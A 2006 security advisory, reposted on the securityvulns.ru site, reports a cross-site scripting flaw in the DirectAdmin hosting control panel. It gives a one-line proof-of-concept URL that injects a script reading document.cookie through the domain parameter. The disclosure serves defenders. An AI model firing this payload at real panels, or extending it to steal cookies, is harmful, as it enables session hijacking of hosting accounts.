Computer Security

Security Advisory: XSS Attack On DirectAdmin Hosting Managment
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Barracuda vuln.

  TextFileBB 1.0.16 Multiple XSS

  TopList <= 1.3.8 (PHPBB Hack) Remote File Inclusion Vulnerability

  W-Agora 4.20 XSS

From:outlaw_(at)_aria-security.net <outlaw_(at)_aria-security.net>
Date:30.04.2006
Subject:XSS Attack On DirectAdmin Hosting Managment

#''''''''''''''''
'''''''''''''''''
'''''''''''''''''
'''''''''''''''''
'''''''''''''''''
'''''''''''''''''
''''''''''''''
#Aria-Security.net Advisory
#Discovered  by: O.U.T.L.A.W
#Outlaw@aria-security.net
#Gr33t to:A.u.r.a  & R@1D3N & Cl0wn & Dtrap
#''''''''''''''''
'''''''''''''''''
'''''''''''''''''
'''''''''''''''''
'''''''''''''''''
'''''''''''''''''
''''''''''''''
? Software: DirectAdmin
? Support Website: http://www.Directadmin.com
? advisory:http://www.aria-security.net/advisory/hm/directadmin.txt
? Summary: DirectAdmin Is A Hosting Managment System
? Tested On: http://www.directadmin.com/demo.html

? Proof of Concept:
LOCAL XSS attack:
http://www.directadmin.com:2222/HTM_PASSWD?domain=".
><script>alert(document.cookie)</script><!--


?Solution:
?contact advisory@aria-security.net

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server